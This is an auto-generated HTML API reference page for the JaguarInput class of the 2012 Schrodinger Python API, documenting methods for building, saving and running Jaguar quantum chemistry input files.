Schrodinger/Schrodinger_2012_docs/python_api/api/schrodinger.application.jaguar.input.JaguarInput-class.html
platinhom/ManualHom
<?xml version="1.0" encoding="ascii"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>schrodinger.application.jaguar.input.JaguarInput</title> <link rel="stylesheet" href="epydoc.css" type="text/css" /> <script type="text/javascript" src="epydoc.js"></script> </head> <body bgcolor="white" text="black" link="blue" vlink="#204080" alink="#204080"> <!-- ==================== NAVIGATION BAR ==================== --> <table class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table width="100%" cellpadding="0" cellspacing="0"> <tr valign="top"> <td width="100%"> <span class="breadcrumbs"> <a href="schrodinger-module.html">Package&nbsp;schrodinger</a> :: <a href="schrodinger.application-module.html">Package&nbsp;application</a> :: <a href="schrodinger.application.jaguar-module.html">Package&nbsp;jaguar</a> :: <a href="schrodinger.application.jaguar.input-module.html">Module&nbsp;input</a> :: Class&nbsp;JaguarInput </span> </td> <td> <table cellpadding="0" cellspacing="0"> <!-- hide/show private --> <tr><td align="right"><span class="options">[<a href="javascript:void(0);" class="privatelink" onclick="toggle_private();">hide&nbsp;private</a>]</span></td></tr> <tr><td align="right"><span class="options" >[<a href="frames.html" target="_top">frames</a >]&nbsp;|&nbsp;<a href="schrodinger.application.jaguar.input.JaguarInput-class.html" target="_top">no&nbsp;frames</a>]</span></td></tr> </table> </td> </tr> </table> <!-- ==================== CLASS DESCRIPTION ==================== --> <h1 class="epydoc">Class JaguarInput</h1><p class="nomargin-top"></p> <pre class="base-tree"> object --+ | <strong class="uidshort">JaguarInput</strong> </pre> <hr /> <p>A class for specifying Jaguar input.</p> <p>This is a thin wrapper to the mmjag library and carries very little internal information.</p> <!-- ==================== INSTANCE METHODS ==================== --> <a name="section-InstanceMethods"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Instance Methods</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-InstanceMethods" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#__init__" class="summary-sig-name">__init__</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">input</span>=<span class="summary-sig-default">None</span>, <span class="summary-sig-arg">name</span>=<span class="summary-sig-default">None</span>, <span class="summary-sig-arg">handle</span>=<span class="summary-sig-default">None</span>, <span class="summary-sig-arg">structure</span>=<span class="summary-sig-default">None</span>, <span class="summary-sig-arg">genkeys</span>=<span class="summary-sig-default">None</span>, <span class="summary-sig-arg">reload</span>=<span class="summary-sig-default">None</span>, <span class="summary-sig-arg">run_kwargs</span>=<span class="summary-sig-default">None</span>)</span><br /> There are three main ways to create a JaguarInput instance: from a Jaguar input file 'input', an mmjag handle 'handle', or a Structure instance 'structure'.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__del__"></a><span class="summary-sig-name">__del__</span>(<span class="summary-sig-arg">self</span>)</span><br /> Delete the mmjag handle and clean up the mmlibs.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="__copy__"></a><span class="summary-sig-name">__copy__</span>(<span class="summary-sig-arg">self</span>)</span><br /> Create a copy of the JaguarInput object, setting name to &lt;jobname&gt;_copy.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#launch" class="summary-sig-name">launch</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">*args</span>, <span class="summary-sig-arg">**kwargs</span>)</span><br /> Save the file and launch a job.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#run" class="summary-sig-name">run</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">**kwargs</span>)</span><br /> Save the file and launch a job with the wait option.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="save"></a><span class="summary-sig-name">save</span>(<span class="summary-sig-arg">self</span>)</span><br /> Write an input file to name.in.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="saveAs"></a><span class="summary-sig-name">saveAs</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">file_</span>)</span><br /> Write an input file to name.in and set the object's name attribute.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr class="private"> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#_setNameFile" class="summary-sig-name" onclick="show_private();">_setNameFile</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">input</span>)</span><br /> Set the name and file properties from a named input file or jobname.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr class="private"> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="_getName"></a><span class="summary-sig-name">_getName</span>(<span class="summary-sig-arg">self</span>)</span><br /> Return the name of the job.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr class="private"> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="_setName"></a><span class="summary-sig-name">_setName</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">name</span>)</span><br /> Set the name of the job and update the filename.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="getAtomCount"></a><span class="summary-sig-name">getAtomCount</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">zmat</span>=<span class="summary-sig-default">0</span>)</span><br /> Return the number of atoms for the specified zmat.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#getValue" class="summary-sig-name">getValue</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">key</span>)</span><br /> Return the &amp;gen section value for keyword 'key'.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="getDefault"></a><span class="summary-sig-name">getDefault</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">key</span>)</span><br /> Return the default value for &amp;gen section keyword 'key'.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#setValue" class="summary-sig-name">setValue</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">key</span>, <span class="summary-sig-arg">value</span>)</span><br /> Set the &amp;gen section keyword 'key' to the value provided.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#setValues" class="summary-sig-name">setValues</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">dict_</span>)</span><br /> Set multiple &amp;gen section keywords from the provided dictionary 'dict_'.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="deleteKey"></a><span class="summary-sig-name">deleteKey</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">key</span>)</span><br /> Remove a key from the &amp;gen section.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="deleteKeys"></a><span class="summary-sig-name">deleteKeys</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">keys</span>)</span><br /> Remove a list of keys from the &amp;gen section.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="getNonDefault"></a><span class="summary-sig-name">getNonDefault</span>(<span class="summary-sig-arg">self</span>)</span><br /> Return a dictionary of all non-default keys except 'multip' and 'molchg', which must be retrieved explicitly since they are connected to the geometry.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="setDirective"></a><span class="summary-sig-name">setDirective</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">name</span>, <span class="summary-sig-arg">value</span>)</span><br /> Set a file specification directive.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="getDirective"></a><span class="summary-sig-name">getDirective</span>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">name</span>)</span><br /> Get a file specification directive.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="getDirectives"></a><span class="summary-sig-name">getDirectives</span>(<span class="summary-sig-arg">self</span>)</span><br /> Get all file specification directives, except for MAEFILE, which is weeded out by the mmjag function itself.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#writeMaefile" class="summary-sig-name">writeMaefile</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">filename</span>=<span class="summary-sig-default">None</span>, <span class="summary-sig-arg">struct</span>=<span class="summary-sig-default">None</span>)</span><br /> Write an associated .mae file and set the MAEFILE directive.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr class="private"> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a name="_getRestart"></a><span class="summary-sig-name">_getRestart</span>(<span class="summary-sig-arg">self</span>)</span><br /> Get the restart name associated with the input file.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#getStructure" class="summary-sig-name">getStructure</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">zmat</span>=<span class="summary-sig-default">0</span>)</span><br /> Return a Structure representation of the specified zmat section.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#setStructure" class="summary-sig-name">setStructure</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">struct</span>, <span class="summary-sig-arg">zmat</span>=<span class="summary-sig-default">0</span>)</span><br /> Set one of the zmat sections from the provided Structure (or MMCT handle).</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr class="private"> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#_setCounterpoise" class="summary-sig-name" onclick="show_private();">_setCounterpoise</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">atom</span>, <span class="summary-sig-arg">value</span>, <span class="summary-sig-arg">zmat</span>=<span class="summary-sig-default">0</span>)</span><br /> Set the counterpoise status (True or False) for the specified atom.</td> <td align="right" valign="top"> </td> </tr> </table> </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>: <code>__delattr__</code>, <code>__format__</code>, <code>__getattribute__</code>, <code>__hash__</code>, <code>__new__</code>, <code>__reduce__</code>, <code>__reduce_ex__</code>, <code>__repr__</code>, <code>__setattr__</code>, <code>__sizeof__</code>, <code>__str__</code>, <code>__subclasshook__</code> </p> </td> </tr> </table> <!-- ==================== CLASS VARIABLES ==================== --> <a name="section-ClassVariables"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Class Variables</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-ClassVariables" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a name="reload"></a><span class="summary-name">reload</span> = <code title="False">False</code> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a name="run_kwargs"></a><span class="summary-name">run_kwargs</span> = <code title="{}"><code class="variable-group">{</code><code class="variable-group">}</code></code> </td> </tr> </table> <!-- ==================== PROPERTIES ==================== --> <a name="section-Properties"></a> <table class="summary" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Properties</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-Properties" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a href="schrodinger.application.jaguar.input.JaguarInput-class.html#name" class="summary-name">name</a><br /> Return the name of the job. </td> </tr> <tr> <td width="15%" align="right" valign="top" class="summary"> <span class="summary-type">&nbsp;</span> </td><td class="summary"> <a href="schrodinger.application.jaguar.input.JaguarInput-class.html#restart" class="summary-name">restart</a><br /> Get the restart jobname based on the current name. </td> </tr> <tr> <td colspan="2" class="summary"> <p class="indent-wrapped-lines"><b>Inherited from <code>object</code></b>: <code>__class__</code> </p> </td> </tr> </table> <!-- ==================== METHOD DETAILS ==================== --> <a name="section-MethodDetails"></a> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Method Details</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-MethodDetails" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> </table> <a name="__init__"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">__init__</span>(<span class="sig-arg">self</span>, <span class="sig-arg">input</span>=<span class="sig-default">None</span>, <span class="sig-arg">name</span>=<span class="sig-default">None</span>, <span class="sig-arg">handle</span>=<span class="sig-default">None</span>, <span class="sig-arg">structure</span>=<span class="sig-default">None</span>, <span class="sig-arg">genkeys</span>=<span class="sig-default">None</span>, <span class="sig-arg">reload</span>=<span class="sig-default">None</span>, <span class="sig-arg">run_kwargs</span>=<span class="sig-default">None</span>)</span> <br /><em class="fname">(Constructor)</em> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <pre class="literalblock"> There are three main ways to create a JaguarInput instance: from a Jaguar input file 'input', an mmjag handle 'handle', or a Structure instance 'structure'. The 'input' parameter will provide for initialization and job name from an existing Jaguar input file. (If no new name is provided, calling the save() method will overwrite the original file.) Note that the structure and name parameters will modify the object status after loading from a file or initialization from a handle has completed. This can be utilized to get the settings from a Jaguar input file but replace the geometry for a new calculation. Parameters input (str) A jaguar input file; a default name will be derived from the input value. name (str) A jaguar job name that will override the name derived from 'input'. handle (int) An mmjag handle, pointing to an existing mmjag instance in memory. structure (schrodinger.structure.Structure) A structure that will populate a new mmjag instance. If specified with 'input' or 'handle' it will replace any structure provided by them. genkeys (mapping) A dictionary of keyword/value pairs to set in the input &amp;gen section. If keywords are specified in this mapping and the file, the genkeys value will be used. reload (bool) Specifies whether to reload the job from an output file in the run() method. Default value is False, but can be modified by setting JaguarInput.reload to a different value. run_kwargs (mapping) The run_kwargs dictionary provides default keyword settings for the run function that is called from the launch and run methods. Default is to set no defaults, but this can be modified by setting JaguarInput.run_kwargs to a different value. </pre> <dl class="fields"> <dt>Overrides: object.__init__ </dt> </dl> </td></tr></table> </div> <a name="launch"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">launch</span>(<span class="sig-arg">self</span>, <span class="sig-arg">*args</span>, <span class="sig-arg">**kwargs</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Save the file and launch a job. Returns a jobcontrol.Job object.</p> <p>Uses the class run_kwargs value as base for keyword arguments to the run function.</p> <dl class="fields"> </dl> </td></tr></table> </div> <a name="run"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">run</span>(<span class="sig-arg">self</span>, <span class="sig-arg">**kwargs</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Save the file and launch a job with the wait option. Returns a JaguarOutput object. Raises an exception if the job failed.</p> <p>Set the class (or instance) attribute reload to True to load existing output files of the same name.</p> <dl class="fields"> </dl> </td></tr></table> </div> <a name="_setNameFile"></a> <div class="private"> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">_setNameFile</span>(<span class="sig-arg">self</span>, <span class="sig-arg">input</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Set the name and file properties from a named input file or jobname.</p> <p>This method keeps the filename and jobname in sync.</p> <dl class="fields"> </dl> </td></tr></table> </div> <a name="getValue"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">getValue</span>(<span class="sig-arg">self</span>, <span class="sig-arg">key</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Return the &amp;gen section value for keyword 'key'.</p> <p>The return type is as defined by mmjag_key_type().</p> <dl class="fields"> </dl> </td></tr></table> </div> <a name="setValue"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">setValue</span>(<span class="sig-arg">self</span>, <span class="sig-arg">key</span>, <span class="sig-arg">value</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Set the &amp;gen section keyword 'key' to the value provided.</p> <p>If value is None, the keyword will be unset.</p> <dl class="fields"> </dl> </td></tr></table> </div> <a name="setValues"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">setValues</span>(<span class="sig-arg">self</span>, <span class="sig-arg">dict_</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Set multiple &amp;gen section keywords from the provided dictionary 'dict_'.</p> <p>Note that one easy way to specify the dict_ argument is via the &quot;dict(basis='6-31g**', igeopt=1)&quot; syntax for constructing a dictionary.</p> <dl class="fields"> </dl> </td></tr></table> </div> <a name="writeMaefile"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">writeMaefile</span>(<span class="sig-arg">self</span>, <span class="sig-arg">filename</span>=<span class="sig-default">None</span>, <span class="sig-arg">struct</span>=<span class="sig-default">None</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <p>Write an associated .mae file and set the MAEFILE directive. If no name is provided, use jobname.mae. If no struct is provided, use self.getStructure().</p> <p>If an absolute filename is not provided but the input file is known, write the mae file relative to the input file.</p> <dl class="fields"> </dl> </td></tr></table> </div> <a name="getStructure"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">getStructure</span>(<span class="sig-arg">self</span>, <span class="sig-arg">zmat</span>=<span class="sig-default">0</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <pre class="literalblock"> Return a Structure representation of the specified zmat section. Note that if the JaguarInput instance was created from a Jaguar input file that has no associated Maestro file (MAEFILE), the Lewis structure is determined automatically based on atom distances. Parameters zmat (mmjag enum) The zmat to return (MMJAG_ZMAT1, MMJAG_ZMAT2, or MMJAG_ZMAT3). </pre> <dl class="fields"> </dl> </td></tr></table> </div> <a name="setStructure"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">setStructure</span>(<span class="sig-arg">self</span>, <span class="sig-arg">struct</span>, <span class="sig-arg">zmat</span>=<span class="sig-default">0</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <pre class="literalblock"> Set one of the zmat sections from the provided Structure (or MMCT handle). Calling this method will update the values of molchg and multip. molchg will be consistent with the sum of formal charges in the provided CT, while multip will be set according to the CT-level i_m_Spin_multiplicity property. Parameters struct (schrodinger.structure.Structure) The structure to use for setting. zmat (mmjag enum) The zmat to set (MMJAG_ZMAT1, MMJAG_ZMAT2, or MMJAG_ZMAT3). </pre> <dl class="fields"> </dl> </td></tr></table> </div> <a name="_setCounterpoise"></a> <div class="private"> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr valign="top"><td> <h3 class="epydoc"><span class="sig"><span class="sig-name">_setCounterpoise</span>(<span class="sig-arg">self</span>, <span class="sig-arg">atom</span>, <span class="sig-arg">value</span>, <span class="sig-arg">zmat</span>=<span class="sig-default">0</span>)</span> </h3> </td><td align="right" valign="top" >&nbsp; </td> </tr></table> <pre class="literalblock"> Set the counterpoise status (True or False) for the specified atom. Parameters atom (int) The index of the atom to modify. value (bool) Use True to make it counterpoise, False to make it real. zmat (mmjag enum) The zmatrix to modify. </pre> <dl class="fields"> </dl> </td></tr></table> </div> <br /> <!-- ==================== PROPERTY DETAILS ==================== --> <a name="section-PropertyDetails"></a> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr bgcolor="#70b0f0" class="table-header"> <td colspan="2" class="table-header"> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr valign="top"> <td align="left"><span class="table-header">Property Details</span></td> <td align="right" valign="top" ><span class="options">[<a href="#section-PropertyDetails" class="privatelink" onclick="toggle_private();" >hide private</a>]</span></td> </tr> </table> </td> </tr> </table> <a name="name"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <h3 class="epydoc">name</h3> <p>Return the name of the job.</p> <dl class="fields"> <dt>Get Method:</dt> <dd class="value"><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#_getName" class="summary-sig-name" onclick="show_private();">_getName</a>(<span class="summary-sig-arg">self</span>)</span> - Return the name of the job. </dd> <dt>Set Method:</dt> <dd class="value"><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#_setName" class="summary-sig-name" onclick="show_private();">_setName</a>(<span class="summary-sig-arg">self</span>, <span class="summary-sig-arg">name</span>)</span> - Set the name of the job and update the filename. </dd> <dt>Delete Method:</dt> <dd class="value"><table><tr><td><pre class="variable"> <code class="variable-quote">'</code><code class="variable-string">Set the jobname; also updates the filename based on the jobname.</code><code class="variable-quote">'</code> </pre></td></tr></table> </dd> </dl> </td></tr></table> </div> <a name="restart"></a> <div> <table class="details" border="1" cellpadding="3" cellspacing="0" width="100%" bgcolor="white"> <tr><td> <h3 class="epydoc">restart</h3> <p>Get the restart jobname based on the current name.</p> <dl class="fields"> <dt>Get Method:</dt> <dd class="value"><span class="summary-sig"><a href="schrodinger.application.jaguar.input.JaguarInput-class.html#_getRestart" class="summary-sig-name" onclick="show_private();">_getRestart</a>(<span class="summary-sig-arg">self</span>)</span> - Get the restart name associated with the input file. </dd> </dl> </td></tr></table> </div> <br /> <!-- ==================== NAVIGATION BAR ==================== --> <table 